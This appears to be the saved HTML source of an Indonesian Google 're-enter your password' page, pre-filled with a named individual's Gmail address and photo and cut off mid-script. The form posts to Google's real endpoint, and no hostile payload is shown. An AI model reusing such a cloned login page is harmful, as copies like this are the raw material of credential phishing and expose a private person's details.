Sie sind auf Seite 1von 23

<!

DOCTYPE html>
<html lang="in">
<head>
<meta charset="utf-8">
<meta content="width=300, initial-scale=1" name="viewport">
<meta name="google" value="notranslate">
<meta name="robots" content="noindex">
<meta name="google-site-verification" content="LrdTUW9psUAMbh4Ia074-BPEVmcpBxF
6Gwf0MSgQXZs">
<title>Masuk - Akun Google</title>
<style>
@font-face {
font-family: 'Open Sans';
font-style: normal;
font-weight: 300;
src: local('Open Sans Light'), local('OpenSans-Light'), url(//fonts.gstatic.co
m/s/opensans/v13/DXI1ORHCpsQm3Vp6mXoaTRampu5_7CjHW5spxoeN3Vs.woff2) format('woff
2');
}
@font-face {
font-family: 'Open Sans';
font-style: normal;
font-weight: 400;
src: local('Open Sans'), local('OpenSans'), url(//fonts.gstatic.com/s/opensans
/v13/cJZKeOuBrn4kERxqtaUH3ZBw1xU1rKptJj_0jans920.woff2) format('woff2');
}
</style>
<style>
h1, h2 {
-webkit-animation-duration: 0.1s;
-webkit-animation-name: fontfix;
-webkit-animation-iteration-count: 1;
-webkit-animation-timing-function: linear;
-webkit-animation-delay: 0;
}
@-webkit-keyframes fontfix {
from {
opacity: 1;
}
to {
opacity: 1;
}
}
</style>
<style>
html, body {
font-family: Arial, sans-serif;
background: #fff;
margin: 0;
padding: 0;
border: 0;
position: absolute;
height: 100%;
min-width: 100%;
font-size: 13px;
color: #404040;
direction: ltr;
-webkit-text-size-adjust: none;
}

button,
input[type=button],
input[type=submit] {
font-family: Arial, sans-serif;
font-size: 13px;
}
a,
a:hover,
a:visited {
color: #427fed;
cursor: pointer;
text-decoration: none;
}
a:hover {
text-decoration: underline;
}
h1 {
font-size: 20px;
color: #262626;
margin: 0 0 15px;
font-weight: normal;
}
h2 {
font-size: 14px;
color: #262626;
margin: 0 0 15px;
font-weight: bold;
}
input[type=email],
input[type=number],
input[type=password],
input[type=tel],
input[type=text],
input[type=url] {
-moz-appearance: none;
-webkit-appearance: none;
appearance: none;
display: inline-block;
height: 36px;
padding: 0 8px;
margin: 0;
background: #fff;
border: 1px solid #d9d9d9;
border-top: 1px solid #c0c0c0;
-moz-box-sizing: border-box;
-webkit-box-sizing: border-box;
box-sizing: border-box;
-moz-border-radius: 1px;
-webkit-border-radius: 1px;
border-radius: 1px;
font-size: 15px;
color: #404040;
}
input[type=email]:hover,
input[type=number]:hover,
input[type=password]:hover,
input[type=tel]:hover,
input[type=text]:hover,
input[type=url]:hover {
border: 1px solid #b9b9b9;

border-top: 1px solid #a0a0a0;


-moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
-webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
}
input[type=email]:focus,
input[type=number]:focus,
input[type=password]:focus,
input[type=tel]:focus,
input[type=text]:focus,
input[type=url]:focus {
outline: none;
border: 1px solid #4d90fe;
-moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
-webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
}
input[type=checkbox],
input[type=radio] {
-webkit-appearance: none;
display: inline-block;
width: 13px;
height: 13px;
margin: 0;
cursor: pointer;
vertical-align: bottom;
background: #fff;
border: 1px solid #c6c6c6;
-moz-border-radius: 1px;
-webkit-border-radius: 1px;
border-radius: 1px;
-moz-box-sizing: border-box;
-webkit-box-sizing: border-box;
box-sizing: border-box;
position: relative;
}
input[type=checkbox]:active,
input[type=radio]:active {
background: #ebebeb;
}
input[type=checkbox]:hover {
border-color: #c6c6c6;
-moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
-webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
}
input[type=radio] {
-moz-border-radius: 1em;
-webkit-border-radius: 1em;
border-radius: 1em;
width: 15px;
height: 15px;
}
input[type=checkbox]:checked,
input[type=radio]:checked {
background: #fff;
}
input[type=radio]:checked::after {
content: '';
display: block;

position: relative;
top: 3px;
left: 3px;
width: 7px;
height: 7px;
background: #666;
-moz-border-radius: 1em;
-webkit-border-radius: 1em;
border-radius: 1em;
}
input[type=checkbox]:checked::after {
content: url(//ssl.gstatic.com/ui/v1/menu/checkmark.png);
display: block;
position: absolute;
top: -6px;
left: -5px;
}
input[type=checkbox]:focus {
outline: none;
border-color: #4d90fe;
}
.stacked-label {
display: block;
font-weight: bold;
margin: .5em 0;
}
.hidden-label {
position: absolute !important;
clip: rect(1px 1px 1px 1px); /* IE6, IE7 */
clip: rect(1px, 1px, 1px, 1px);
height: 0px;
width: 0px;
overflow: hidden;
visibility: hidden;
}
input[type=checkbox].form-error,
input[type=email].form-error,
input[type=number].form-error,
input[type=password].form-error,
input[type=text].form-error,
input[type=tel].form-error,
input[type=url].form-error {
border: 1px solid #dd4b39;
}
.error-msg {
margin: .5em 0;
display: block;
color: #dd4b39;
line-height: 17px;
}
.help-link {
background: #dd4b39;
padding: 0 5px;
color: #fff;
font-weight: bold;
display: inline-block;
-moz-border-radius: 1em;
-webkit-border-radius: 1em;
border-radius: 1em;
text-decoration: none;

position: relative;
top: 0px;
}
.help-link:visited {
color: #fff;
}
.help-link:hover {
color: #fff;
background: #c03523;
text-decoration: none;
}
.help-link:active {
opacity: 1;
background: #ae2817;
}
.wrapper {
position: relative;
min-height: 100%;
}
.content {
padding: 0 44px;
}
.main {
padding-bottom: 100px;
}
/* For modern browsers */
.clearfix:before,
.clearfix:after {
content: "";
display: table;
}
.clearfix:after {
clear: both;
}
/* For IE 6/7 (trigger hasLayout) */
.clearfix {
zoom:1;
}
.google-header-bar {
height: 71px;
border-bottom: 1px solid #e5e5e5;
overflow: hidden;
}
.header .logo {
background-image: url(//ssl.gstatic.com/accounts/ui/logo_1x.png);
background-size: 116px 38px;
background-repeat: no-repeat;
margin: 17px 0 0;
float: left;
height: 38px;
width: 116px;
}
.header .logo-w {
background-image: url(//ssl.gstatic.com/images/branding/googlelogo/1x/googlelo
go_color_112x36dp.png);
background-size: 112px 36px;
}
.header .secondary-link {
margin: 28px 0 0;
float: right;

}
.header .secondary-link a {
font-weight: normal;
}
.google-header-bar.centered {
border: 0;
height: 108px;
}
.google-header-bar.centered .header .logo {
float: none;
margin: 40px auto 30px;
display: block;
}
.google-header-bar.centered .header .secondary-link {
display: none
}
.google-footer-bar {
position: absolute;
bottom: 0;
height: 35px;
width: 100%;
border-top: 1px solid #e5e5e5;
overflow: hidden;
}
.footer {
padding-top: 7px;
font-size: .85em;
white-space: nowrap;
line-height: 0;
}
.footer ul {
float: left;
max-width: 80%;
min-height: 16px;
padding: 0;
}
.footer ul li {
color: #737373;
display: inline;
padding: 0;
padding-right: 1.5em;
}
.footer a {
color: #737373;
}
.lang-chooser-wrap {
float: right;
display: inline;
}
.lang-chooser-wrap img {
vertical-align: top;
}
.lang-chooser {
font-size: 13px;
height: 24px;
line-height: 24px;
}
.lang-chooser option {
font-size: 13px;
line-height: 24px;

}
.hidden {
height: 0px;
width: 0px;
overflow: hidden;
visibility: hidden;
display: none !important;
}
.banner {
text-align: center;
}
.card {
background-color: #f7f7f7;
padding: 20px 25px 30px;
margin: 0 auto 25px;
width: 304px;
-moz-border-radius: 2px;
-webkit-border-radius: 2px;
border-radius: 2px;
-moz-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
-webkit-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
}
.card > *:first-child {
margin-top: 0;
}
.rc-button,
.rc-button:visited {
display: inline-block;
min-width: 46px;
text-align: center;
color: #444;
font-size: 14px;
font-weight: 700;
height: 36px;
padding: 0 8px;
line-height: 36px;
-moz-border-radius: 3px;
-webkit-border-radius: 3px;
border-radius: 3px;
-o-transition: all 0.218s;
-moz-transition: all 0.218s;
-webkit-transition: all 0.218s;
transition: all 0.218s;
border: 1px solid #dcdcdc;
background-color: #f5f5f5;
background-image: -webkit-linear-gradient(top,#f5f5f5,#f1f1f1);
background-image: -moz-linear-gradient(top,#f5f5f5,#f1f1f1);
background-image: -ms-linear-gradient(top,#f5f5f5,#f1f1f1);
background-image: -o-linear-gradient(top,#f5f5f5,#f1f1f1);
background-image: linear-gradient(top,#f5f5f5,#f1f1f1);
-o-transition: none;
-moz-user-select: none;
-webkit-user-select: none;
user-select: none;
cursor: default;
}
.card .rc-button {
width: 100%;
padding: 0;

}
.rc-button.disabled,
.rc-button[disabled] {
opacity: .5;
filter: alpha(opacity=50);
cursor: default;
pointer-events: none;
}
.rc-button:hover {
border: 1px solid #c6c6c6;
color: #333;
text-decoration: none;
-o-transition: all 0.0s;
-moz-transition: all 0.0s;
-webkit-transition: all 0.0s;
transition: all 0.0s;
background-color: #f8f8f8;
background-image: -webkit-linear-gradient(top,#f8f8f8,#f1f1f1);
background-image: -moz-linear-gradient(top,#f8f8f8,#f1f1f1);
background-image: -ms-linear-gradient(top,#f8f8f8,#f1f1f1);
background-image: -o-linear-gradient(top,#f8f8f8,#f1f1f1);
background-image: linear-gradient(top,#f8f8f8,#f1f1f1);
-moz-box-shadow: 0 1px 1px rgba(0,0,0,0.1);
-webkit-box-shadow: 0 1px 1px rgba(0,0,0,0.1);
box-shadow: 0 1px 1px rgba(0,0,0,0.1);
}
.rc-button:active {
background-color: #f6f6f6;
background-image: -webkit-linear-gradient(top,#f6f6f6,#f1f1f1);
background-image: -moz-linear-gradient(top,#f6f6f6,#f1f1f1);
background-image: -ms-linear-gradient(top,#f6f6f6,#f1f1f1);
background-image: -o-linear-gradient(top,#f6f6f6,#f1f1f1);
background-image: linear-gradient(top,#f6f6f6,#f1f1f1);
-moz-box-shadow: 0 1px 2px rgba(0,0,0,0.1);
-webkit-box-shadow: 0 1px 2px rgba(0,0,0,0.1);
box-shadow: 0 1px 2px rgba(0,0,0,0.1);
}
.rc-button-submit,
.rc-button-submit:visited {
border: 1px solid #3079ed;
color: #fff;
text-shadow: 0 1px rgba(0,0,0,0.1);
background-color: #4d90fe;
background-image: -webkit-linear-gradient(top,#4d90fe,#4787ed);
background-image: -moz-linear-gradient(top,#4d90fe,#4787ed);
background-image: -ms-linear-gradient(top,#4d90fe,#4787ed);
background-image: -o-linear-gradient(top,#4d90fe,#4787ed);
background-image: linear-gradient(top,#4d90fe,#4787ed);
}
.rc-button-submit:hover {
border: 1px solid #2f5bb7;
color: #fff;
text-shadow: 0 1px rgba(0,0,0,0.3);
background-color: #357ae8;
background-image: -webkit-linear-gradient(top,#4d90fe,#357ae8);
background-image: -moz-linear-gradient(top,#4d90fe,#357ae8);
background-image: -ms-linear-gradient(top,#4d90fe,#357ae8);
background-image: -o-linear-gradient(top,#4d90fe,#357ae8);
background-image: linear-gradient(top,#4d90fe,#357ae8);
}

.rc-button-submit:active {
background-color: #357ae8;
background-image: -webkit-linear-gradient(top,#4d90fe,#357ae8);
background-image: -moz-linear-gradient(top,#4d90fe,#357ae8);
background-image: -ms-linear-gradient(top,#4d90fe,#357ae8);
background-image: -o-linear-gradient(top,#4d90fe,#357ae8);
background-image: linear-gradient(top,#4d90fe,#357ae8);
-moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
-webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
}
.rc-button-red,
.rc-button-red:visited {
border: 1px solid transparent;
color: #fff;
text-shadow: 0 1px rgba(0,0,0,0.1);
background-color: #d14836;
background-image: -webkit-linear-gradient(top,#dd4b39,#d14836);
background-image: -moz-linear-gradient(top,#dd4b39,#d14836);
background-image: -ms-linear-gradient(top,#dd4b39,#d14836);
background-image: -o-linear-gradient(top,#dd4b39,#d14836);
background-image: linear-gradient(top,#dd4b39,#d14836);
}
.rc-button-red:hover {
border: 1px solid #b0281a;
color: #fff;
text-shadow: 0 1px rgba(0,0,0,0.3);
background-color: #c53727;
background-image: -webkit-linear-gradient(top,#dd4b39,#c53727);
background-image: -moz-linear-gradient(top,#dd4b39,#c53727);
background-image: -ms-linear-gradient(top,#dd4b39,#c53727);
background-image: -o-linear-gradient(top,#dd4b39,#c53727);
background-image: linear-gradient(top,#dd4b39,#c53727);
}
.rc-button-red:active {
border: 1px solid #992a1b;
background-color: #b0281a;
background-image: -webkit-linear-gradient(top,#dd4b39,#b0281a);
background-image: -moz-linear-gradient(top,#dd4b39,#b0281a);
background-image: -ms-linear-gradient(top,#dd4b39,#b0281a);
background-image: -o-linear-gradient(top,#dd4b39,#b0281a);
background-image: linear-gradient(top,#dd4b39,#b0281a);
-moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
-webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
}
.secondary-actions {
text-align: center;
}
</style>
<style media="screen and (max-width: 800px), screen and (max-height: 800px)">
.google-header-bar.centered {
height: 83px;
}
.google-header-bar.centered .header .logo {
margin: 25px auto 20px;
}
.card {
margin-bottom: 20px;
}

</style>
<style media="screen and (max-width: 580px)">
html, body {
font-size: 14px;
}
.google-header-bar.centered {
height: 73px;
}
.google-header-bar.centered .header .logo {
margin: 20px auto 15px;
}
.content {
padding-left: 10px;
padding-right: 10px;
}
.hidden-small {
display: none;
}
.card {
padding: 20px 15px 30px;
width: 270px;
}
.footer ul li {
padding-right: 1em;
}
.lang-chooser-wrap {
display: none;
}
</style>
<style media="screen and (-webkit-min-device-pixel-ratio: 1.5), (min--moz-device
-pixel-ratio: 1.5), (-o-min-device-pixel-ratio: 3 / 2), (min-device-pixel-ratio:
1.5)">
.header .logo {
background-image: url(//ssl.gstatic.com/accounts/ui/logo_2x.png);
}
.header .logo-w {
background-image: url(//ssl.gstatic.com/images/branding/googlelogo/2x/googlelo
go_color_112x36dp.png);
}
</style>
<style>
pre.debug {
font-family: monospace;
position: absolute;
left: 0;
margin: 0;
padding: 1.5em;
font-size: 13px;
background: #f1f1f1;
border-top: 1px solid #e5e5e5;
direction: ltr;
white-space: pre-wrap;
width: 90%;
overflow: hidden;
}
</style>
<style>
.banner h1 {
font-family: 'Open Sans', arial;
-webkit-font-smoothing: antialiased;

color: #555;
font-size: 42px;
font-weight: 300;
margin-top: 0;
margin-bottom: 20px;
}
.banner h2 {
font-family: 'Open Sans', arial;
-webkit-font-smoothing: antialiased;
color: #555;
font-size: 18px;
font-weight: 400;
margin-bottom: 20px;
}
.signin-card {
width: 274px;
padding: 40px 40px;
}
.signin-card .profile-img {
width: 96px;
height: 96px;
margin: 0 auto 10px;
display: block;
-moz-border-radius: 50%;
-webkit-border-radius: 50%;
border-radius: 50%;
}
.signin-card .profile-name {
font-size: 16px;
font-weight: bold;
text-align: center;
margin: 10px 0 0;
min-height: 1em;
}
.signin-card .profile-email {
font-size: 16px;
text-align: center;
margin: 10px 0 20px 0;
min-height: 1em;
}
.signin-card input[type=email],
.signin-card input[type=password],
.signin-card input[type=text],
.signin-card input[type=submit] {
width: 100%;
display: block;
margin-bottom: 10px;
z-index: 1;
position: relative;
-moz-box-sizing: border-box;
-webkit-box-sizing: border-box;
box-sizing: border-box;
}
.signin-card #Email,
.signin-card #Passwd,
.signin-card .captcha {
direction: ltr;
height: 44px;
font-size: 16px;
}

.signin-card #Email + .stacked-label {


margin-top: 15px;
}
.signin-card #reauthEmail {
display: block;
margin-bottom: 10px;
line-height: 36px;
padding: 0 8px;
font-size: 15px;
color: #404040;
line-height: 2;
margin-bottom: 10px;
font-size: 14px;
text-align: center;
overflow: hidden;
text-overflow: ellipsis;
white-space: nowrap;
-moz-box-sizing: border-box;
-webkit-box-sizing: border-box;
box-sizing: border-box;
}
.one-google p {
margin: 0 0 10px;
color: #555;
font-size: 14px;
text-align: center;
}
.one-google p.create-account,
.one-google p.switch-account {
margin-bottom: 60px;
}
.one-google .logo-strip {
background-image: url(//ssl.gstatic.com/accounts/ui/logo_strip_1x.png);
background-size: 210px 17px;
background-repeat: no-repeat;
display: block;
width: 210px;
height: 17px;
margin: 10px auto;
}
</style>
<style media="screen and (max-width: 800px), screen and (max-height: 800px)">
.banner h1 {
font-size: 38px;
margin-bottom: 15px;
}
.banner h2 {
margin-bottom: 15px;
}
.one-google p.create-account,
.one-google p.switch-account {
margin-bottom: 30px;
}
.signin-card #Email {
margin-bottom: 0;
}
.signin-card #Passwd {
margin-top: -1px;
}
.signin-card #Email.form-error,

.signin-card #Passwd.form-error {
z-index: 2;
}
.signin-card #Email:hover,
.signin-card #Email:focus,
.signin-card #Passwd:hover,
.signin-card #Passwd:focus {
z-index: 3;
}
</style>
<style media="screen and (max-width: 580px)">
.banner h1 {
font-size: 22px;
margin-bottom: 15px;
}
.signin-card {
width: 260px;
padding: 20px 20px;
margin: 0 auto 20px;
}
.signin-card .profile-img {
width: 72px;
height: 72px;
-moz-border-radius: 72px;
-webkit-border-radius: 72px;
border-radius: 72px;
}
</style>
<style media="screen and (-webkit-min-device-pixel-ratio: 1.5), (min--moz-device
-pixel-ratio: 1.5), (-o-min-device-pixel-ratio: 3 / 2), (min-device-pixel-ratio:
1.5)">
.one-google .logo-strip {
background-image: url(//ssl.gstatic.com/accounts/ui/logo_strip_2x.png);
}
</style>
<style>
.need-help-reverse {
float: right;
}
.remember .bubble-wrap {
position: absolute;
padding-top: 3px;
-o-transition: opacity .218s ease-in .218s;
-moz-transition: opacity .218s ease-in .218s;
-webkit-transition: opacity .218s ease-in .218s;
transition: opacity .218s ease-in .218s;
left: -999em;
opacity: 0;
width: 314px;
margin-left: -20px;
}
.remember:hover .bubble-wrap,
.remember input:focus ~ .bubble-wrap,
.remember .bubble-wrap:hover,
.remember .bubble-wrap:focus {
opacity: 1;
left: inherit;
}
.bubble-pointer {
border-left: 10px solid transparent;

border-right: 10px solid transparent;


border-bottom: 10px solid #fff;
width: 0;
height: 0;
margin-left: 17px;
}
.bubble {
background-color: #fff;
padding: 15px;
margin-top: -1px;
font-size: 11px;
-moz-border-radius: 2px;
-webkit-border-radius: 2px;
border-radius: 2px;
-moz-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
-webkit-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
}
</style>
</head>
<body>
<div class="wrapper">
<div class="google-header-bar centered">
<div class="header content clearfix">
<div class="logo " aria-label="Google"></div>
</div>
</div>
<div class="main content clearfix">
<div class="banner">
<h2>
Masukkan kembali sandi Anda
</h2>
</div>
<div class="card signin-card">
<div id="cc_iframe_parent"></div>
<img id="profile-img" class="profile-img" src="//lh4.googleusercontent.com/-2nO
dJZCU-l0/AAAAAAAAAAI/AAAAAAAAAAA/U7lmMu84gaI/photo.jpg?sz=120" alt="">
<p class="profile-name">Iswanto Wanto</p>
<form novalidate method="post" action="https://accounts.google.com/ServiceLogi
nAuth" id="gaia_loginform">
<input name="GALX" type="hidden"
value="KLnYDbnNCUM">
<input name="continue" type="hidden" value="https://accounts.google.com/b/0/Sm
sAuthSettings">
<input name="followup" type="hidden" value="https://accounts.google.com/b/0/Sm
sAuthSettings">
<input type="hidden" id="_utf8" name="_utf8" value="&#9731;"/>
<input type="hidden" name="bgresponse" id="bgresponse" value="js_disabled">
<input type="hidden" id="pstMsg" name="pstMsg" value="0">
<input type="hidden" id="dnConn" name="dnConn" value="">
<input type="hidden" id="checkConnection" name="checkConnection" value="">
<input type="hidden" id="checkedDomains" name="checkedDomains"
value="youtube">
<span id="reauthEmail" class="reauth-email">iswanto2020@gmail.com</span>
<input id="Email" name="Email" type="email" class="email-input hidden"
placeholder="Email"
value="iswanto2020@gmail.com"
spellcheck="false" readonly>
<label class="hidden-label" for="Passwd">Sandi</label>
<input id="Passwd" name="Passwd" type="password"

placeholder="Sandi"
class="">
<input id="signIn" name="signIn" class="rc-button rc-button-submit" type="subm
it" value="Masuk">
<a id="link-forgot-passwd" href="https://accounts.google.com/RecoverAccount?c
ontinue=https%3A%2F%2Faccounts.google.com%2Fb%2F0%2FSmsAuthSettings&amp;Email=is
wanto2020%40gmail.com"
>
Butuh bantuan?
</a>
</form>
</div>
<div class="one-google">
<p class="switch-account">
<a id="account-chooser-link" href="https://accounts.google.com/AccountChooser?
continue=https%3A%2F%2Faccounts.google.com%2Fb%2F0%2FSmsAuthSettings&amp;followu
p=https%3A%2F%2Faccounts.google.com%2Fb%2F0%2FSmsAuthSettings">
Masuk dengan akun lain
</a>
</p>
</div>
</div>
<div class="google-footer-bar">
<div class="footer content clearfix">
<ul id="footer-list">
<li>
<a href="https://www.google.com/intl/in/about" target="_blank">
Tentang Google
</a>
</li>
<li>
<a href="https://accounts.google.com/TOS?loc=ID&hl=in&privacy=true" target="_b
lank">
Privasi
</a>
</li>
<li>
<a href="https://accounts.google.com/TOS?loc=ID&hl=in" target="_blank">
Persyaratan
</a>
</li>
<li>
<a href="http://www.google.com/support/accounts?hl=in" target="_blank">
Bantuan
</a>
</li>
</ul>
</div>
</div>
</div>
<script type="text/javascript">
var gaia_attachEvent = function(element, event, callback) {
if (element.addEventListener) {
element.addEventListener(event, callback, false);
} else if (element.attachEvent) {
element.attachEvent('on' + event, callback);
}
};
(function() {
var gaia_hideNavBar = function() {

setTimeout(function() {
window.scrollTo(0, 1);
}, 0);
};
gaia_attachEvent(window, 'load', gaia_hideNavBar);
})();
</script>
<script>var G,Gb=function(a,b){var c=a;a&&"string"==typeof a&&(c=document.getE
lementById(a));if(b&&!c)throw new Ga(a);return c},Ga=function(a){this.id=a;this.
toString=function(){return"No element found for id '"+this.id+"'"}};var Gc={},Gf
=function(a,b,c){var d=function(a){var b=c.call(this,a);!1===b&&Gd(a);return b};
a=Gb(a,!0);a.addEventListener(b,d,!1);Ge(a,b).push(d);return d},Gg=function(a,b,
c){a=Gb(a,!0);var d=function(){var b=window.event,d=c.call(a,b);!1===d&&Gd(b);re
turn d};a.attachEvent("on"+b,d);Ge(a,b).push(d);return d},Gh;Gh=window.addEventL
istener?Gf:window.attachEvent?Gg:void 0;var Gd=function(a){a.preventDefault?a.pr
eventDefault():a.returnValue=!1;return!1};
var Ge=function(a,b){Gc[a]=Gc[a]||{};Gc[a][b]=Gc[a][b]||[];return Gc[a][b]};var
Gi=function(){try{return new XMLHttpRequest}catch(a){for(var b=["MSXML2.XMLHTTP.
6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"],c=0;c<b.length;c
++)try{return new ActiveXObject(b[c])}catch(d){}}return null},Gj=function(){this
.request=Gi();this.parameters={}};
Gj.prototype.send=function(a,b){var c=[],d;for(d in this.parameters){var e=this.
parameters[d];c.push(d+"="+encodeURIComponent(e))}var c=c.join("&"),f=this.reque
st;f.open("POST",a,!0);f.setRequestHeader("Content-type","application/x-www-form
-urlencoded");f.onreadystatechange=function(){4==f.readyState&&b({status:f.statu
s,text:f.responseText})};f.send(c)};
Gj.prototype.get=function(a,b){var c=this.request;c.open("GET",a,!0);c.onreadyst
atechange=function(){4==c.readyState&&b({status:c.status,text:c.responseText})};
c.send()};var Gl=function(a){this.g=a;this.v=this.o();if(null==this.g)throw new
Gk("Empty module name");};G=Gl.prototype;G.o=function(){var a=window.location.pa
thname;return a&&0==a.indexOf("/accounts")?"/accounts/JsRemoteLog":"/JsRemoteLog
"};
G.j=function(a,b,c){var d=this.v,e=this.g||"",d=d+"?module="+encodeURIComponent(
e);a=a||"";d=d+"&type="+encodeURIComponent(a);b=b||"";d=d+"&msg="+encodeURICompo
nent(b);c=c||[];for(a=0;a<c.length;a++)d=d+"&arg="+encodeURIComponent(c[a]);try{
var f=Math.floor(1E4*Math.random()),d=d+"&r="+String(f)}catch(g){}return d};G.se
nd=function(a,b,c){var d=new Gj;d.parameters={};try{var e=this.j(a,b,c);d.get(e,
function(){})}catch(f){}};G.error=function(a,b){this.send("ERROR",a,b)};
G.warn=function(a,b){this.send("WARN",a,b)};G.info=function(a,b){this.send("INFO
",a,b)};G.f=function(a){var b=this;return function(){try{return a.apply(null,arg
uments)}catch(c){throw b.error("Uncatched exception: "+c),c;}}};var Gk=function(
){};var Gm=Gm||new Gl("uri"),Gn=RegExp("^(?:([^:/?#.]+):)?(?://(?:([^/?#]*)@)?([
\\w\\d\\-\\u0100-\\uffff.%]*)(?::([0-9]+))?)?([^?#]+)?(?:\\?([^#]*))?(?:#(.*))?$
"),Go=function(a){return"http"==a.toLowerCase()?80:"https"==a.toLowerCase()?443:
null},Gp=function(a,b){var c=b.match(Gn)[1]||null,d,e=b.match(Gn)[3]||null;d=e&&
decodeURIComponent(e);e=Number(b.match(Gn)[4]||null)||null;if(!c||!d)return Gm.e
rror("Invalid origin Exception",[String(b)]),!1;e||(e=Go(c));var f=a.match(Gn)[1
]||null;if(!f||f.toLowerCase()!=
c.toLowerCase())return!1;c=(c=a.match(Gn)[3]||null)&&decodeURIComponent(c);if(!c
||c.toLowerCase()!=d.toLowerCase())return!1;(d=Number(a.match(Gn)[4]||null)||nul
l)||(d=Go(f));return e==d};var Gq=Gq||new Gl("check_connection"),Gr=null,Gs=null
,Gt=null,Gu=function(a,b){this.c=a;this.b=b;this.a=!1};G=Gu.prototype;G.i=functi
on(a,b){if(!b)return!1;if(0<=a.indexOf(","))return Gq.error("CheckConnection res
ult contains comma",[a]),!1;var c=b.value;b.value=c?c+","+a:a;return!0};G.h=func
tion(a){return this.i(a,Gs)};G.w=function(a){return this.i(a,Gt)};G.m=function(a
){a=a.match("^([^:]+):(\\d*):(\\d?)$");return!a||3>a.length?null:a[1]};
G.u=function(a,b){if(!Gp(this.c,a))return!1;if(this.a||!b)return!0;"accessible"=
=b?(this.h(a),this.a=!0):this.m(b)==this.b&&(this.w(b)||this.h(a),this.a=!0);ret
urn!0};G.s=function(){var a;a=this.c;var b="timestamp",c=String((new Date).getTi
me());if(0<a.indexOf("#"))throw Object("Unsupported URL Exception: "+a);return a

=0<=a.indexOf("?")?a+"&"+encodeURIComponent(b)+"="+encodeURIComponent(c):a+"?"+e
ncodeURIComponent(b)+"="+encodeURIComponent(c)};
G.l=function(){var a=window.document.createElement("iframe"),b=a.style;b.visibil
ity="hidden";b.width="1px";b.height="1px";b.position="absolute";b.top="-100px";a
.src=this.s();a.id=this.b;Gr.appendChild(a)};
var Gv=function(a){return function(b){var c=b.origin.toLowerCase();b=b.data;for(
var d=a.length,e=0;e<d&&!a[e].u(c,b);e++);}},Gw=function(){if(window.postMessage
){var a;a=window.__CHECK_CONNECTION_CONFIG.iframeParentElementId;var b=window.__
CHECK_CONNECTION_CONFIG.connectivityElementId,c=window.__CHECK_CONNECTION_CONFIG
.newResultElementId;(Gr=document.getElementById(a))?(b&&(Gs=document.getElementB
yId(b)),c&&(Gt=document.getElementById(c)),Gs||Gt?a=!0:(Gq.error("Unable to loca
te the input element to storeCheckConnection result",
["old id: "+String(b),"new id: "+String(c)]),a=!1)):(Gq.error("Unable to locate
the iframe anchor to append connection test iframe",["element id: "+a]),a=!1);if
(a){a=window.__CHECK_CONNECTION_CONFIG.domainConfigs;if(!a){if(!window.__CHECK_C
ONNECTION_CONFIG.iframeUri){Gq.error("Missing iframe URL in old configuration");
return}a=[{iframeUri:window.__CHECK_CONNECTION_CONFIG.iframeUri,domainSymbol:"yo
utube"}]}if(0!=a.length){for(var b=a.length,c=[],d=0;d<b;d++)c.push(new Gu(a[d].
iframeUri,a[d].domainSymbol));
Gh(window,"message",Gv(c));for(d=0;d<b;d++)c[d].l()}}}},Gx=function(){if(window.
__CHECK_CONNECTION_CONFIG){var a=window.__CHECK_CONNECTION_CONFIG.postMsgSupport
ElementId;if(window.postMessage){var b=document.getElementById(a);b?b.value="1":
Gq.error("Unable to locate the input element to storepostMessage test result",["
element id: "+a])}}};G_checkConnectionMain=Gq.f(Gw);G_setPostMessageSupportFlag=
Gq.f(Gx);
</script>
<script>
window.__CHECK_CONNECTION_CONFIG = {
newResultElementId: 'checkConnection',
domainConfigs: [{iframeUri: 'https://accounts.youtube.com/accounts/CheckConnec
tion?pmpo\75https%3A%2F%2Faccounts.google.com\46v\75-1671263557',domainSymbol: '
youtube'}],
iframeUri: '',
iframeOrigin: '',
connectivityElementId: 'dnConn',
iframeParentElementId: 'cc_iframe_parent',
postMsgSupportElementId: 'pstMsg',
msgContent: 'accessible'
};
G_setPostMessageSupportFlag();
G_checkConnectionMain();
</script>
<script type="text/javascript">/* Anti-spam. Want to say hello? Contact (base6
4) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t */(function(){eval('var h=function(a,b,c
,d,e){c=a.split("."),d=f,c[0]in d||!d.execScript||d.execScript("var "+c[0]);for(
;c.length&&(e=c.shift());)c.length||void 0===b?d=d[e]?d[e]:d[e]={}:d[e]=b},k=fun
ction(a,b,c){if(b=typeof a,"object"==b)if(a){if(a instanceof Array)return"array"
;if(a instanceof Object)return b;if(c=Object.prototype.toString.call(a),"[object
Window]"==c)return"object";if("[object Array]"==c||"number"==typeof a.length&&"
undefined"!=typeof a.splice&&"undefined"!=typeof a.propertyIsEnumerable&&!a.prop
ertyIsEnumerable("splice"))return"array";if("[object Function]"==c||"undefined"!
=typeof a.call&&"undefined"!=typeof a.propertyIsEnumerable&&!a.propertyIsEnumera
ble("call"))return"function"}else return"null";else if("function"==b&&"undefined
"==typeof a.call)return"object";return b},q=function(a,b,c){return 2>=arguments.
length?p.slice.call(a,b):p.slice.call(a,b,c)},f=this,p=Array.prototype,t,z=(new
function(){},function(a,b,c,d,e,g){try{for(this.c=[],v(this,this.b,0),v(this,thi
s.s,0),v(this,this.aa,"object"==typeof window?window:f),v(this,this.i,x(4)),v(th
